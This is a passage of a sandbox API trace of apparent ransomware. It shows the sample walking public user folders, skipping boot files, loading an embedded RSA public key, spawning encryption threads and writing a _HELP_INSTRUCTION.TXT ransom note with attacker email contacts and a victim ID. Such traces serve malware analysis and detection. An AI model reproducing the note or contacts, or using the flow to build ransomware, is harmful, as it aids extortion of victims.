f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0142.856] lstrcpyW (in: lpString1=0x17be7c, lpString2="Sleep Away.mp3" | out: lpString1="Sleep Away.mp3") returned="Sleep Away.mp3" [0142.856] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" [0142.856] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x89c [0142.857] Sleep (dwMilliseconds=0x96) [0143.057] FindNextFileW (in: hFindFile=0x3d118d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0143.057] FindClose (in: hFindFile=0x3d118d8 | out: hFindFile=0x3d118d8) returned 1 [0143.058] FindClose (in: hFindFile=0x3d118d8 | out: hFindFile=0x3d118d8) returned 0 [0143.061] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Music\\Sample Music" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music") returned="C:\\Users\\Public\\Music\\Sample Music" [0143.062] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\Sample Music", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music\\*.*") returned="C:\\Users\\Public\\Music\\Sample Music\\*.*" [0143.062] StrStrW (lpFirst="C:\\Users\\Public\\Music\\Sample Music\\", lpSrch="Desktop") returned 0x0 [0143.062] StrStrW (lpFirst="C:\\Users\\Public\\Music\\Sample Music\\", lpSrch="DESKTOP") returned 0x0 [0143.062] SetErrorMode (uMode=0x1) returned 0x1 [0143.062] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Music\\Sample Music\\_HELP_INSTRUCTION.TXT") returned 56 [0143.062] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0143.062] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0143.062] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x8b0) returned 0x0 [0143.062] RegQueryValueExW (in: hKey=0x8b0, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4373f08, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x4373f08*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0143.062] RegCloseKey (hKey=0x8b0) returned 0x0 [0143.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0143.062] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0143.062] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\music\\sample music\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0143.062] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\music\\sample music\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8b0 [0143.063] WriteFile (in: hFile=0x8b0, lpBuffer=0x17943c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x179434, lpOverlapped=0x0 | out: lpBuffer=0x17943c*, lpNumberOfBytesWritten=0x179434*=0x2c4, lpOverlapped=0x0) returned 1 [0143.063] CloseHandle (hObject=0x8b0) returned 1 [0143.063] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3d118d8 [0143.063] PathFindFileNameW (pszPath="C:\\Users\\Public\\Music\\Sample Music") returned="Sample Music" [0143.063] lstrcpyW (in: lpString1=0x17b644, lpString2="Sample Music" | out: lpString1="Sample Music") returned="Sample Music" [0143.063] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0143.063] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0143.063] FindNextFileW (in: hFindFile=0x3d118d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0143.064] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0143.064] FindNextFileW (in: hFindFile=0x3d118d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0143.064] FindNextFileW (in: hFindFile=0x3d118d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0143.064] FindNextFileW (in: hFindFile=0x3d118d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0143.064] FindNextFileW (in: hFindFile=0x3d118d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0143.064] FindNextFileW (in: hFindFile=0x3d118d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0143.064] FindNextFileW (in: hFindFile=0x3d118d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0143.064] FindClose (in: hFindFile=0x3d118d8 | out: hFindFile=0x3d118d8) returned 1 [0143.064] FindClose (in: hFindFile=0x3d118d8 | out: hFindFile=0x3d118d8) returned 0 [0143.064] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0143.064] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0143.064] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 1 [0143.064] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 0 [0143.064] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0143.064] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1 [0143.064] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1 [0143.064] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0143.064] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0143.064] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Pictures" | out: lpString1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures" [0143.064] SetErrorMode (uMode=0x1) returned 0x1 [0143.064] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Pictures" | out: lpString1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures" [0143.064] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Pictures\\") returned="C:\\Users\\Public\\Pictures\\" [0143.064] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\") returned="C:\\Users\\Public\\Pictures\\" [0143.064] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Pictures\\*.*") returned="C:\\Users\\Public\\Pictures\\*.*" [0143.064] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3d11398 [0143.064] PathFindFileNameW (pszPath="C:\\Users\\Public\\Pictures") returned="Pictures" [0143.064] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Pictures" | out: lpString1="Pictures") returned="Pictures" [0143.065] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0143.065] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0143.065] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0143.065] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0143.065] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0143.065] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0143.065] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0143.065] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0143.065] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0143.065] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\", lpSrch="Desktop") returned 0x0 [0143.065] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0143.065] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\") returned 29 [0143.065] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0143.065] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0143.065] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\" [0143.065] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8c0 [0143.066] Sleep (dwMilliseconds=0x96) [0143.338] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0143.338] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0143.338] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0143.338] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0143.338] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0143.338] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0143.338] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 1 [0143.338] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 0 [0143.339] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Pictures" | out: lpString1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures" [0143.339] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Pictures\\*.*") returned="C:\\Users\\Public\\Pictures\\*.*" [0143.339] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\", lpSrch="Desktop") returned 0x0 [0143.339] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0143.339] SetErrorMode (uMode=0x1) returned 0x1 [0143.339] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Pictures\\_HELP_INSTRUCTION.TXT") returned 46 [0143.339] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0143.339] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0143.339] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x870) returned 0x0 [0143.339] RegQueryValueExW (in: hKey=0x870, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4374138, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x4374138*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0143.339] RegCloseKey (hKey=0x870) returned 0x0 [0143.339] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0143.339] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0143.339] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\pictures\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x870 [0143.340] CloseHandle (hObject=0x870) returned 1 [0143.340] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3d11398 [0143.340] PathFindFileNameW (pszPath="C:\\Users\\Public\\Pictures") returned="Pictures" [0143.340] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Pictures" | out: lpString1="Pictures") returned="Pictures" [0143.340] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0143.340] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0143.340] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0143.340] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0143.340] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0143.340] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0143.340] lstrcmpW (lpString1="Sample Pictures", lpString2="..") returned 1 [0143.340] lstrcmpW (lpString1="Sample Pictures", lpString2=".") returned 1 [0143.340] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Public\\Pictures" | out: lpString1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures" [0143.340] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Pictures\\") returned="C:\\Users\\Public\\Pictures\\" [0143.340] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\", lpString2="Sample Pictures" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures") returned="C:\\Users\\Public\\Pictures\\Sample Pictures" [0143.340] SetErrorMode (uMode=0x1) returned 0x1 [0143.340] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures") returned="C:\\Users\\Public\\Pictures\\Sample Pictures" [0143.340] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0143.340] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0143.340] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\*.*") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\*.*" [0143.340] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3d11998 [0143.524] PathFindFileNameW (pszPath="C:\\Users\\Public\\Pictures\\Sample Pictures") returned="Sample Pictures" [0143.524] lstrcpyW (in: lpString1=0x17b644, lpString2="Sample Pictures" | out: lpString1="Sample Pictures") returned="Sample Pictures" [0143.524] FindNextFileW (in: hFindFile=0x3d11998, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0143.524] FindNextFileW (in: hFindFile=0x3d11998, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0143.524] lstrcmpW (lpString1="Chrysanthemum.jpg", lpString2="..") returned 1 [0143.524] lstrcmpW (lpString1="Chrysanthemum.jpg", lpString2=".") returned 1 [0143.524] StrStrW (lpFirst="Chrysanthemum.jpg", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0143.524] StrStrW (lpFirst="Chrysanthemum.jpg", lpSrch="ntldr") returned 0x0 [0143.524] StrStrW (lpFirst="Chrysanthemum.jpg", lpSrch="NTLDR") returned 0x0 [0143.524] StrStrW (lpFirst="Chrysanthemum.jpg", lpSrch="NTDETECT.COM") returned 0x0 [0143.524] StrStrW (lpFirst="Chrysanthemum.jpg", lpSrch="ntdetect.com") returned 0x0 [0143.524] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="Desktop") returned 0x0 [0143.524] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="DESKTOP") returned 0x0 [0143.524] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 45 [0143.524] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0143.524] lstrcpyW (in: lpString1=0x17be7c, lpString2="Chrysanthemum.jpg" | out: lpString1="Chrysanthemum.jpg") returned="Chrysanthemum.jpg" [0143.524] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0143.524] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x898 [0143.525] Sleep (dwMilliseconds=0x96) [0143.697] FindNextFileW (in: hFindFile=0x3d11998, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0143.697] lstrcmpW (lpString1="Desert.jpg", lpString2="..") returned 1 [0143.697] lstrcmpW (lpString1="Desert.jpg", lpString2=".") returned 1 [0143.697] StrStrW (lpFirst="Desert.jpg", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0143.697] StrStrW (lpFirst="Desert.jpg", lpSrch="ntldr") returned 0x0 [0143.697] StrStrW (lpFirst="Desert.jpg", lpSrch="NTLDR") returned 0x0 [0143.697] StrStrW (lpFirst="Desert.jpg", lpSrch="NTDETECT.COM") returned 0x0 [0143.697] StrStrW (lpFirst="Desert.jpg", lpSrch="ntdetect.com") returned 0x0 [0143.697] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="Desktop") returned 0x0 [0143.697] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="DESKTOP") returned 0x0 [0143.697] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 45 [0143.697] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0143.697] lstrcpyW (in: lpString1=0x17be7c, lpString2="Desert.jpg" | out: lpString1="Desert.jpg") returned="Desert.jpg" [0143.697] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0143.697] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8a0 [0143.697] Sleep (dwMilliseconds=0x96) [0143.932] FindNextFileW (in: hFindFile=0x3d11998, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0143.932] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0143.932] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0143.932] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0143.932] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0143.932] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0143.932] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0143.932] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0143.932] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="Desktop") returned 0x0 [0143.932] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="DESKTOP") returned 0x0 [0143.932] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 45 [0143.932] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- 